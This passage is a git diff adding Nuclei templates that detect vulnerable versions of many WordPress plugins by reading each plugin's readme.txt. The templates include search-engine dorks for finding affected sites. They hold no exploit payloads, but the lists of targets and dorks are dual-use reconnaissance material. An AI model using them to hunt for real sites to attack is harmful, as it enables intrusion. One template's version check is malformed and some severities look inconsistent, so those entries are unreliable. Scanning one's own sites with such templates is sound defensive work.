reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f37fb598-72a2-48d3-b2e6-63d6654b1474?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/advanced-category-and-custom-taxonomy-image/" + google-query: inurl:"/wp-content/plugins/advanced-category-and-custom-taxonomy-image/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,advanced-category-and-custom-taxonomy-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/advanced-category-and-custom-taxonomy-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "advanced-category-and-custom-taxonomy-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.9') \ No newline at end of file diff --git a/poc/other/arconix-shortcodes-6211e427613ea6a179193b7355acf836.yaml b/poc/other/arconix-shortcodes-6211e427613ea6a179193b7355acf836.yaml new file mode 100644 index 0000000000..a4794843e7 --- /dev/null +++ b/poc/other/arconix-shortcodes-6211e427613ea6a179193b7355acf836.yaml @@ -0,0 +1,59 @@ +id: arconix-shortcodes-6211e427613ea6a179193b7355acf836 + +info: + name: > + Arconix Shortcodes <= 2.1.12 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ef395956-477c-4970-becd-4f437e4807a3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/arconix-shortcodes/" + google-query: inurl:"/wp-content/plugins/arconix-shortcodes/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,arconix-shortcodes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arconix-shortcodes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arconix-shortcodes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.12') \ No newline at end of file diff --git a/poc/other/branding-bb37f6417503b5ce748656e458facde1.yaml b/poc/other/branding-bb37f6417503b5ce748656e458facde1.yaml new file mode 100644 index 0000000000..8528d44eb1 --- /dev/null +++ b/poc/other/branding-bb37f6417503b5ce748656e458facde1.yaml @@ -0,0 +1,59 @@ +id: branding-bb37f6417503b5ce748656e458facde1 + +info: + name: > + Branding <= 1.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8736cf81-3fb8-4c81-a878-7d73a3e68fc2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/branding/" + google-query: inurl:"/wp-content/plugins/branding/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,branding,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/branding/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "branding" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/other/bulk-image-resizer-b562d45258ab161721689720617accce.yaml b/poc/other/bulk-image-resizer-b562d45258ab161721689720617accce.yaml new file mode 100644 index 0000000000..c8d26d03c4 --- /dev/null +++ b/poc/other/bulk-image-resizer-b562d45258ab161721689720617accce.yaml @@ -0,0 +1,59 @@ +id: bulk-image-resizer-b562d45258ab161721689720617accce + +info: + name: > + Bulk images optimizer: Resize, optimize, convert to webp, rename ... <= 2.0.1 - Missing Authorization to Authenticated (Subscriber+) Plugin Options Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a189e436-e8af-4379-aa6e-2d1a4a2d4bfa?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bulk-image-resizer/" + google-query: inurl:"/wp-content/plugins/bulk-image-resizer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bulk-image-resizer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bulk-image-resizer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bulk-image-resizer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.1') \ No newline at end of file diff --git a/poc/other/create-flipbook-from-pdf.yaml b/poc/other/create-flipbook-from-pdf.yaml new file mode 100644 index 0000000000..f5f2fe6dd2 --- /dev/null +++ b/poc/other/create-flipbook-from-pdf.yaml @@ -0,0 +1,59 @@ +id: create-flipbook-from-pdf + +info: + name: > + Creates 3D Flipbook, PDF Flipbook <= 1.2 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b5c8733-7396-4ae5-862d-15db370dbdd7?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/create-flipbook-from-pdf/" + google-query: inurl:"/wp-content/plugins/create-flipbook-from-pdf/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,create-flipbook-from-pdf,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/create-flipbook-from-pdf/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "create-flipbook-from-pdf" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2') \ No newline at end of file diff --git a/poc/other/debrandify-af092808d29c61cc63a89aeb529b32ca.yaml b/poc/other/debrandify-af092808d29c61cc63a89aeb529b32ca.yaml new file mode 100644 index 0000000000..c74edc1ac1 --- /dev/null +++ b/poc/other/debrandify-af092808d29c61cc63a89aeb529b32ca.yaml @@ -0,0 +1,59 @@ +id: debrandify-af092808d29c61cc63a89aeb529b32ca + +info: + name: > + Debrandify · Remove or Replace WordPress Branding <= 1.1.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a2110d13-d6d3-43f8-b1bf-8958d4f39ef5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/debrandify/" + google-query: inurl:"/wp-content/plugins/debrandify/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,debrandify,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/debrandify/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "debrandify" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file diff --git a/poc/other/disc-golf-manager.yaml b/poc/other/disc-golf-manager.yaml new file mode 100644 index 0000000000..6de7ecffcd --- /dev/null +++ b/poc/other/disc-golf-manager.yaml @@ -0,0 +1,59 @@ +id: disc-golf-manager + +info: + name: > + Disc Golf Manager <= 1.0.0 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cf85ddc7-cb90-4502-9936-f2c51030b4a6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/disc-golf-manager/" + google-query: inurl:"/wp-content/plugins/disc-golf-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,disc-golf-manager,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/disc-golf-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "disc-golf-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/other/easy-post-types-41dccfb17f0433d3add9d08a47570aa1.yaml b/poc/other/easy-post-types-41dccfb17f0433d3add9d08a47570aa1.yaml new file mode 100644 index 0000000000..0468f69bd4 --- /dev/null +++ b/poc/other/easy-post-types-41dccfb17f0433d3add9d08a47570aa1.yaml @@ -0,0 +1,59 @@ +id: easy-post-types-41dccfb17f0433d3add9d08a47570aa1 + +info: + name: > + WP Easy Post Types <= 1.4.4 - Authenticated (Subscriber+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d038f1a2-4755-417f-965d-508b57c05738?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/easy-post-types/" + google-query: inurl:"/wp-content/plugins/easy-post-types/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,easy-post-types,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-post-types/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-post-types" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/other/easy-post-types-422d4e69ffd0199ede6b487dc4d39805.yaml b/poc/other/easy-post-types-422d4e69ffd0199ede6b487dc4d39805.yaml new file mode 100644 index 0000000000..8f58ddad05 --- /dev/null +++ b/poc/other/easy-post-types-422d4e69ffd0199ede6b487dc4d39805.yaml @@ -0,0 +1,59 @@ +id: easy-post-types-422d4e69ffd0199ede6b487dc4d39805 + +info: + name: > + WP Easy Post Types <= 1.4.4 - Authenticated (Subscriber+) Missing Authorization via Multiple Functions + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d12c4b1c-23d0-430f-a6ea-0a3ab487ed10?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/easy-post-types/" + google-query: inurl:"/wp-content/plugins/easy-post-types/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,easy-post-types,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-post-types/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-post-types" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/other/easy-post-types-681e1b321c3a1aa369c7bb180213815e.yaml b/poc/other/easy-post-types-681e1b321c3a1aa369c7bb180213815e.yaml new file mode 100644 index 0000000000..30ef9e58f9 --- /dev/null +++ b/poc/other/easy-post-types-681e1b321c3a1aa369c7bb180213815e.yaml @@ -0,0 +1,59 @@ +id: easy-post-types-681e1b321c3a1aa369c7bb180213815e + +info: + name: > + WP Easy Post Types <= 1.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Post Meta + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1bee1eeb-5354-47c9-9ae1-b1608d87d7bb?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/easy-post-types/" + google-query: inurl:"/wp-content/plugins/easy-post-types/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,easy-post-types,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-post-types/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-post-types" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/other/elemenda-36540ed00b00575eb872e13e9900b7cd.yaml b/poc/other/elemenda-36540ed00b00575eb872e13e9900b7cd.yaml new file mode 100644 index 0000000000..7aea3c5298 --- /dev/null +++ b/poc/other/elemenda-36540ed00b00575eb872e13e9900b7cd.yaml @@ -0,0 +1,59 @@ +id: elemenda-36540ed00b00575eb872e13e9900b7cd + +info: + name: > + Elemenda <= 0.0.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4a8ac027-f376-4f02-a085-f05f1fa749f0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/elemenda/" + google-query: inurl:"/wp-content/plugins/elemenda/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,elemenda,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/elemenda/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "elemenda" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.0.2') \ No newline at end of file diff --git a/poc/other/event-calendars.yaml b/poc/other/event-calendars.yaml new file mode 100644 index 0000000000..527850289c --- /dev/null +++ b/poc/other/event-calendars.yaml @@ -0,0 +1,59 @@ +id: event-calendars + +info: + name: > + Event Calendar <= 1.0.4 - Missing Authorization to Unauthenticated Arbitrary Calendar Deletion + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9694f4e0-be99-4122-82d2-b22e7422c877?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/event-calendars/" + google-query: inurl:"/wp-content/plugins/event-calendars/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,event-calendars,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/event-calendars/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "event-calendars" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.4') \ No newline at end of file diff --git a/poc/other/external-featured-image-from-bing.yaml b/poc/other/external-featured-image-from-bing.yaml new file mode 100644 index 0000000000..7c74d44045 --- /dev/null +++ b/poc/other/external-featured-image-from-bing.yaml @@ -0,0 +1,59 @@ +id: external-featured-image-from-bing + +info: + name: > + External featured image from bing <= 1.0.2 - Authenticated (Subscriber+) Remote Code Execution + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/22d5a45b-41bd-4f65-b8b7-d7efb2b9cecf?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/external-featured-image-from-bing/" + google-query: inurl:"/wp-content/plugins/external-featured-image-from-bing/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,external-featured-image-from-bing,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/external-featured-image-from-bing/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "external-featured-image-from-bing" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/other/featured-posts-with-multiple-custom-groups-fpmcg.yaml b/poc/other/featured-posts-with-multiple-custom-groups-fpmcg.yaml new file mode 100644 index 0000000000..02369dff0b --- /dev/null +++ b/poc/other/featured-posts-with-multiple-custom-groups-fpmcg.yaml @@ -0,0 +1,59 @@ +id: featured-posts-with-multiple-custom-groups-fpmcg + +info: + name: > + Featured Posts with Multiple Custom Groups (FPMCG) <= 4.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bc6fce33-af42-466e-8e76-1e027d5d52ec?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/" + google-query: inurl:"/wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,featured-posts-with-multiple-custom-groups-fpmcg,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "featured-posts-with-multiple-custom-groups-fpmcg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0') \ No newline at end of file diff --git a/poc/other/flat-ui-button-89c780e5fcb1649d68625aca09850426.yaml b/poc/other/flat-ui-button-89c780e5fcb1649d68625aca09850426.yaml new file mode 100644 index 0000000000..8ecf421e3e --- /dev/null +++ b/poc/other/flat-ui-button-89c780e5fcb1649d68625aca09850426.yaml @@ -0,0 +1,59 @@ +id: flat-ui-button-89c780e5fcb1649d68625aca09850426 + +info: + name: > + Flat UI Button <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via flatbtn Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec5474ac-62d7-4431-b789-51c831dd1c20?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/flat-ui-button/" + google-query: inurl:"/wp-content/plugins/flat-ui-button/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,flat-ui-button,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/flat-ui-button/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "flat-ui-button" + part: body + + - type: dsl + dsl: + - compare_versions(version, '1.0') \ No newline at end of file diff --git a/poc/other/flexmls-idx.yaml b/poc/other/flexmls-idx.yaml new file mode 100644 index 0000000000..a84787b036 --- /dev/null +++ b/poc/other/flexmls-idx.yaml @@ -0,0 +1,59 @@ +id: flexmls-idx + +info: + name: > + Flexmls® IDX Plugin <= 3.14.22 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aac3fb8e-9b92-4ed1-ac9f-50870d4c5c9f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/flexmls-idx/" + google-query: inurl:"/wp-content/plugins/flexmls-idx/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,flexmls-idx,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/flexmls-idx/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "flexmls-idx" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.14.22') \ No newline at end of file diff --git a/poc/other/fonto.yaml b/poc/other/fonto.yaml new file mode 100644 index 0000000000..bbad48bd42 --- /dev/null +++ b/poc/other/fonto.yaml @@ -0,0 +1,59 @@ +id: fonto + +info: + name: > + Fonto – Custom Web Fonts Manager <= 1.2.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/358be91d-cb00-429b-a4ed-69bf81e4d19e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/fonto/" + google-query: inurl:"/wp-content/plugins/fonto/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,fonto,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fonto/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fonto" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/other/gantry-8355d258c5013eab39c370d8a445bea5.yaml b/poc/other/gantry-8355d258c5013eab39c370d8a445bea5.yaml new file mode 100644 index 0000000000..923e274e37 --- /dev/null +++ b/poc/other/gantry-8355d258c5013eab39c370d8a445bea5.yaml @@ -0,0 +1,59 @@ +id: gantry-8355d258c5013eab39c370d8a445bea5 + +info: + name: > + Gantry 4 Framework <= 4.1.21 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d539a066-6b59-4235-868e-f3085436e9f4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/gantry/" + google-query: inurl:"/wp-content/plugins/gantry/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,gantry,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gantry/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gantry" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.21') \ No newline at end of file diff --git a/poc/other/getresponse-5843fd2130c195d444e82707bb1d32a3.yaml b/poc/other/getresponse-5843fd2130c195d444e82707bb1d32a3.yaml new file mode 100644 index 0000000000..08a8a104d6 --- /dev/null +++ b/poc/other/getresponse-5843fd2130c195d444e82707bb1d32a3.yaml @@ -0,0 +1,59 @@ +id: getresponse-5843fd2130c195d444e82707bb1d32a3 + +info: + name: > + GetResponse Forms by Optin Cat <= 2.5.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/51d14f45-4c30-4225-998d-f4f829e09bc0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/getresponse/" + google-query: inurl:"/wp-content/plugins/getresponse/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,getresponse,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/getresponse/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "getresponse" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.6') \ No newline at end of file diff --git a/poc/other/infinite-scroll-ecc3ceebb8b22551e98ee5bec4ce51d4.yaml b/poc/other/infinite-scroll-ecc3ceebb8b22551e98ee5bec4ce51d4.yaml new file mode 100644 index 0000000000..c33451663f --- /dev/null +++ b/poc/other/infinite-scroll-ecc3ceebb8b22551e98ee5bec4ce51d4.yaml @@ -0,0 +1,59 @@ +id: infinite-scroll-ecc3ceebb8b22551e98ee5bec4ce51d4 + +info: + name: > + Infinite-Scroll <= 2.6.2 - Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4045575a-35f0-46e5-afb7-93eee9be3a97?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/infinite-scroll/" + google-query: inurl:"/wp-content/plugins/infinite-scroll/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,infinite-scroll,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/infinite-scroll/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "infinite-scroll" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.2') \ No newline at end of file diff --git a/poc/other/ip-loc8.yaml b/poc/other/ip-loc8.yaml new file mode 100644 index 0000000000..3883392424 --- /dev/null +++ b/poc/other/ip-loc8.yaml @@ -0,0 +1,59 @@ +id: ip-loc8 + +info: + name: > + IP Loc8 <= 1.1 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/24092cd1-cf89-49c1-a607-4d5d06d0c804?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ip-loc8/" + google-query: inurl:"/wp-content/plugins/ip-loc8/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ip-loc8,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ip-loc8/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ip-loc8" + part: body + + - type: 